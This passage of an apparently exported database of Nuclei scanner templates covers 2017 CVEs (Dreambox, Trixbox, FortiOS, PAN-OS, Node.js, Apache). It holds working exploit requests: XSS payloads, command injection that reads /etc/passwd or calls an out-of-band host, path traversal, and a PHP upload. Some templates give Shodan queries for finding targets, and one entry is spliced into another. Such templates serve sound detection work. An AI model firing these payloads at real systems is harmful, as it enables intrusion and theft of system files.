0.59827\n cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: djangoproject\n product: django\n tags: cve2017,cve,xss,django,djangoproject\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022045d37d6d95dbcf0d99b3dd98b0548af3f80775282906963e91de53ddd88178e102207fef1b1e81deb1e461760619d1398e0d670d6ad1cb6109983598f16783a68676:922c64590222798bb761d5b6d8e72950", "hash": "d3ce6e41726556b4db6ee4321d9bb8b8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc3" }, "name": "CVE-2017-14135.yaml", "content": "id: CVE-2017-14135\n\ninfo:\n name: OpenDreambox 2.0.0 - Remote Code Execution\n author: alph4byt3\n severity: critical\n description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of OpenDreambox.\n reference:\n - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/\n - https://www.exploit-db.com/exploits/42293\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14135\n - https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/\n - https://github.com/qazbnm456/awesome-cve-poc\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-14135\n cwe-id: CWE-78\n epss-score: 0.96679\n epss-percentile: 0.99625\n cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dreambox\n product: opendreambox\n shodan-query: title:\"Dreambox WebControl\"\n tags: cve,cve2017,dreambox,rce,oast,edb\n\nhttp:\n - raw:\n - |\n GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"/bin/sh\"\n - \"/usr/script\"\n condition: and\n\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220698aef45fb765d687383961414979c5887eddf98121aa39048ba6f22392d374802202c71c44bdf2e149840f9cef78912bb4112076d87527c5b8a8744946b59339791:922c64590222798bb761d5b6d8e72950", "hash": "e88e432679d85b6d390f807ee5138f65", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc4" }, "name": "CVE-2017-14186.yaml", "content": "id: CVE-2017-14186\n\ninfo:\n name: FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting\n author: johnk3r\n severity: medium\n description: |\n FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.\n remediation: |\n Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability.\n reference:\n - https://www.fortiguard.com/psirt/FG-IR-17-242\n - https://fortiguard.com/advisory/FG-IR-17-242\n - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14186\n - http://www.securitytracker.com/id/1039891\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2017-14186\n cwe-id: CWE-79\n epss-score: 0.02948\n epss-percentile: 0.89847\n cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fortinet\n product: fortios\n shodan-query: port:10443 http.favicon.hash:945408572\n tags: cve2017,cve,fortigate,xss,fortinet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\"'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207fbfece700e8438f7ceb29e6cb4c1c3db50af2a9118f2a83bd83f1038f9e82d6022100a1093d8d2a97f1f72a728b30504eb3343bb6c5154e62389cc9ab4c4b6c8d3bf6:922c64590222798bb761d5b6d8e72950", "hash": "2b01a99b0f58b0fbd27c60062f435eed", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc5" }, "name": "CVE-2017-14524.yaml", "content": "id: CVE-2017-14524\n\ninfo:\n name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator.\n reference:\n - https://seclists.org/fulldisclosure/2017/Sep/57\n - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14524\n - http://seclists.org/fulldisclosure/2017/Sep/57\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-14524\n cwe-id: CWE-601\n epss-score: 0.00258\n epss-percentile: 0.6357\n cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: opentext\n product: documentum_administrator\n tags: cve2017,cve,redirect,opentext,seclists\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$'\n# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950", "hash": "d51a991278ab885b2f11c70dc9885687", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc6" }, "name": "CVE-2017-14535.yaml", "content": "id: CVE-2017-14535\n\ninfo:\n name: Trixbox - 2.8.0.4 OS Command Injection\n author: pikpikcu\n severity: high\n description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor.\n reference:\n - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/\n - https://www.exploit-db.com/exploits/49913\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14535\n - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t\n - https://twitter.com/tiger_tigerboy/status/962689803270500352\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-14535\n cwe-id: CWE-78\n epss-score: 0.04456\n epss-percentile: 0.91577\n cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netfortris\n product: trixbox\n tags: cve,cve2017,trixbox,rce,injection,edb,netfortris\n\nhttp:\n - raw:\n - |\n GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: de,en-US;q=0.7,en;q=0.3\n Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n Connection: close\n Cache-Control: max-age=0\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022004c2c0b0bfc6a4b5299eb051ed30519d948e89244430b213fad2de42968d5d0602207a33257c46086bb05aa71c1e223813644d52d434ee6d268a0c78b20851101d53:922c64590222798bb761d5b6d8e72950", "hash": "d1b14d276615840446fb4d309f40e4b7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc7" }, "name": "CVE-2017-14537.yaml", "content": "id: CVE-2017-14537\n\ninfo:\n name: Trixbox 2.8.0 - Path Traversal\n author: pikpikcu\n severity: medium\n description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability.\n reference:\n - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14537\n - https://sourceforge.net/projects/asteriskathome/\n - http://packetstormsecurity.com/files/162853/Trixbox-2.8.0.4-Path-Traversal.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2017-14537\n cwe-id: CWE-22\n epss-score: 0.01002\n epss-percentile: 0.81968\n cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: netfortris\n product: trixbox\n tags: cve,cve2017,trixbox,lfi,packetstorm,netfortris\n\nhttp:\n - raw:\n - |\n POST /maint/index.php?packages HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{Hostname}}/maint/index.php?packages\n Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\n Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\n xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n - |\n GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Referer: {{Hostname}}/maint/index.php?packages\n Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\n Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dfdc6074c62d2b9fa504221e526fa86d4918ccb5fa03a6d416b7c3e3db979398022100befa0ade8449e62b774fab5bf32a5397402c437966bb993ac5f882d24bedab9d:922c64590222798bb761d5b6d8e72950", "hash": "5c674d7b9516a12177c020a669bd5b1a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc8" }, "name": "CVE-2017-14622.yaml", "content": "id: CVE-2017-14622\n\ninfo:\n name: WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html\n - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14622\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-14622\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47816\n cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: 2kblater\n product: 2kb_amazon_affiliates_store\n framework: wordpress\n tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 500'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"2kb-amazon-affiliates-store\")'\n condition: and\n# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950", "hash": "7eb93ca6063444a0b224b8dd2448cdba", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc9" }, "name": "CVE-2017-14651.yaml", "content": "id: CVE-2017-14651\n\ninfo:\n name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting\n author: mass0ma\n severity: medium\n description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/cybersecurityworks/Disclosed/issues/15\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265\n - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14651\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2017-14651\n cwe-id: CWE-79\n epss-score: 0.00144\n epss-percentile: 0.49339\n cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wso2\n product: api_manager\n tags: cve,cve2017,wso2,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"Failed to add new collection\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 4a0a00473045022034f84ef006638a070852b350742ad77cd35f09148d0fbf4414429225a72f02e1022100c0814184d527fbae67d23da2ebd61e4645fa2c28e29bff5142f47a551b927bcf:922c64590222798bb761d5b6d8e72950", "hash": "3aea62a64bad1354aa531a64ecd08476", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fca" }, "name": "CVE-2017-14849.yaml", "content": "id: CVE-2017-14849\n\ninfo:\n name: Node.js <8.6.0 - Directory Traversal\n author: Random_Robbie\n severity: high\n description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to \"..\" handling is incompatible with the pathname validation used by unspecified community modules.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability.\n reference:\n - https://twitter.com/nodejs/status/913131152868876288\n - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14849\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-14849\n cwe-id: CWE-22\n epss-score: 0.96684\n epss-percentile: 0.99566\n cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nodejs\n product: node.js\n tags: cve2017,cve,nodejs,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/static/../../../a/../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210091a03fe8bc062a8f4ab9b7ce6642025c5599951a009a17ed9ef4ffe4e24c7ccd0220570d8f49b671763897be8c2893f0da5b7e725eaa8a75b1d33581fc1327547dff:922c64590222798bb761d5b6d8e72950", "hash": "3d0d2b7f7ae521926f9508a5113135b4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fcb" }, "name": "CVE-2017-15287.yaml", "content": "id: CVE-2017-15287\n\ninfo:\n name: Dreambox WebControl 2.0.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.\n reference:\n - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf\n - https://www.exploit-db.com/exploits/42986/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-15287\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-15287\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.46737\n cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*\n metadata:\n max-request: 1\n vendor: bouqueteditor_project\n product: bouqueteditor\n framework: dreambox\n tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project\n\nhttp:\n - raw:\n - |\n GET /webadmin/pkg?command= HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers:\n - type: word\n words:\n - 'Unknown command: '\n# digest: 4b0a00483046022100d24d22a1cb3faec3366b57b8dbfa41642ebe1edf9ea030d6be399c7e13235dba022100bad23fce4b4a160d392284f9c0d6801f889143bcc01bac423b6cb519c33403ea:922c64590222798bb761d5b6d8e72950", "hash": "37d69ec3dd8d2e2b75ac3735e0e2e563", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fcc" }, "name": "CVE-2017-15363.yaml", "content": "id: CVE-2017-15363\n\ninfo:\n name: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.\n impact: |\n The vulnerability allows an attacker to include local files, potentially leading to unauthorized access or code execution.\n remediation: |\n Update to the latest version of Restler and TYPO3 to fix the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/42985\n - https://extensions.typo3.org/extension/restler/\n - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-15363\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-15363\n cwe-id: CWE-22\n epss-score: 0.04393\n epss-percentile: 0.92189\n cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:*\n metadata:\n max-request: 1\n vendor: luracast\n product: restler\n framework: typo3\n tags: cve,cve2017,restler,lfi,edb,luracast,typo3\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \", which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.\n impact: |\n An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.\n remediation: |\n Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715\n - https://httpd.apache.org/security/vulnerabilities_24.html\n - http://www.openwall.com/lists/oss-security/2018/03/24/6\n - https://nvd.nist.gov/vuln/detail/CVE-2017-15715\n - http://www.securitytracker.com/id/1040570\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2017-15715\n cwe-id: CWE-20\n epss-score: 0.96163\n epss-percentile: 0.99387\n cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: http_server\n tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n ------WebKitFormBoundaryKc8fBVDo558U4hbJ\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n {{randstr_1}}\n\n ------WebKitFormBoundaryKc8fBVDo558U4hbJ\n Content-Disposition: form-data; name=\"name\"\n\n {{randstr}}.php\\x0A\n ------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n - |\n GET /{{randstr}}.php\\x0A HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip,deflate\n Accept: */*\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"{{randstr_1}}\")'\n# digest: 4b0a00483046022100ae5641ddd92e3d444dbbb35c3b15e833ad880957167aa6fad3e696b3f05e57d6022100a1460cf01679d7a517dba54d83abe3fa648044075c4c3c88058ee7687bb5a231:922c64590222798bb761d5b6d8e72950", "hash": "010bd5f802f0d221c44a8ebc943411ab", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fcf" }, "name": "CVE-2017-15944.yaml", "content": "id: CVE-2017-15944\n\ninfo:\n name: Palo Alto Network PAN-OS - Remote Code Execution\n author: emadshanab,milo2012\n severity: critical\n description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches and updates provided by Palo Alto Networks.\n reference:\n - https://www.exploit-db.com/exploits/43342\n - https://security.paloaltonetworks.com/CVE-2017-15944\n - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-15944\n - http://www.securitytracker.com/id/1040007\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-15944\n epss-score: 0.97314\n epss-percentile: 0.99866\n cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: paloaltonetworks\n product: pan-os\n tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks\n\nhttp:\n - raw:\n - |\n GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\n Host: {{Hostname}}\n Cookie: PHPSESSID={{randstr}};\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"@start@Success@end@\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e0ebb82c78017bace95bb6bdbbd956c0ceefa723b30e23eaf66e133c3671020b02201e43c7c0e0a433896c4df5cfcc72d35bc21c5ead69bbb1c20e4903dc8d6705a1:922c64590222798bb761d5b6d8e72950", "hash": "00934c38a92bd42fb183d3af70b909d6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd0" }, "name": "CVE-2017-16806.yaml", "content": "id: CVE-2017-16806\n\ninfo:\n name: Ulterius Server < 1.9.5.0 - Directory Traversal\n author: geeknik\n severity: high\n description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.\n remediation: |\n Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/43141\n - https://nvd.nist.gov/vuln/detail/CVE-2017-16806\n - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee\n - https://www.exploit-db.com/exploits/43141/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-16806\n cwe-id: CWE-22\n epss-score: 0.07105\n epss-percentile: 0.93842\n cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: ulterius\n product: ulterius_server\n tags: cve2017,cve,ulterius,traversal,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini\"\n - \"{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"\\\\[(font|extension|file)s\\\\]\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ba4a0e6757347a8f45e93acf626f6b963960f94fc7cb1934493fe84196f558602205b4f7a68184fc2f970c513193e6955898cadf0658f112d2d32e77c5af8eeb3ca:922c64590222798bb761d5b6d8e72950", "hash": "559a4f8cb1fe8b32f27fde54426f75a0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fd1" }, "name": "CVE-2017-16877.yaml", "content": "id: CVE-2017-16877\n\ninfo:\n name: Nextjs <2.4.1 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Upgrade Nextjs to version 2.4.1 or above to mitigate this vulnerability.\n reference:\n - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9\n - 